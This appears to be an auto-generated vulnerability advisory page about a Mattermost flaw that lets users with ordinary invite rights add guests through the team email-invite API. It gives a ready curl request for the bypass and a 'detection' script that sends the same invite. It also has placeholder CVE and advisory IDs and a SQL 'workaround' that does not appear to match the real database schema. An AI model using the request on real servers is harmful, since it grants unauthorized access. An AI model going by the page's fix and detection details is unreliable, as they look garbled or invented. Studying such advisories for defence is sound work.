Mattermost, Improper Access Control, CVE-2025-XXXXX (Moderate)

By /

Listen to this Post

Mattermost fails to validate team invite permissions correctly in affected versions, allowing authenticated users with non-guest invite privileges to bypass restrictions and invite guest users via API. The vulnerability stems from insufficient server-side validation when processing `POST /api/v4/teams/{team_id}/invites/email` requests. Attackers exploit this by crafting a malicious API call with a guest user’s email, despite lacking the required `invite_guest` permission. The system only checks for `invite_user` rights, granting unintended access.

DailyCVE Form

Platform: Mattermost
Version: 10.6.1, 10.5.2, 10.4.4, 9.11.11
Vulnerability: Improper Access Control
Severity: Moderate
Date: May 17, 2025

What Undercode Say:

Exploitation:

1. Attacker authenticates with valid credentials.

2. Sends crafted API request:

curl -X POST -H "Authorization: Bearer <TOKEN>" -H "Content-Type: application/json" -d '{"emails":["[email protected]"], "team_id":"<TEAM_ID>"}' https://<MATTERMOST_HOST>/api/v4/teams/<TEAM_ID>/invites/email

3. Guest user added despite missing permissions.

Mitigation:

  1. Upgrade to patched versions (10.6.2, 10.5.3, 10.4.5, 9.11.12).

2. Apply temporary workaround:

UPDATE Permissions SET roles = 'system_admin team_admin' WHERE name = 'invite_guest';

3. Audit logs for suspicious invites:

grep "invites/email" /var/log/mattermost/access.log | grep "guest"

Detection:

import requests
def check_vuln(host, token):
headers = {"Authorization": f"Bearer {token}"}
r = requests.post(f"{host}/api/v4/teams/test/invites/email", headers=headers, json={"emails":["[email protected]"]})
return "guest" in r.text and r.status_code == 201

Patch Analysis:

The fix enforces `invite_guest` checks in `api4/team.go`:

if !a.HasPermissionToTeam(userId, teamId, model.PermissionInviteGuest) {
return nil, a.MakePermissionError(session, []model.Permission{model.PermissionInviteGuest})
}

Impact: Unauthorized guest access escalates team privileges, risking data leaks.

References:

  • GitHub Advisory: GHSA-xxxx-xxxx-xxxx
  • NVD: CVE-2025-XXXXX

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top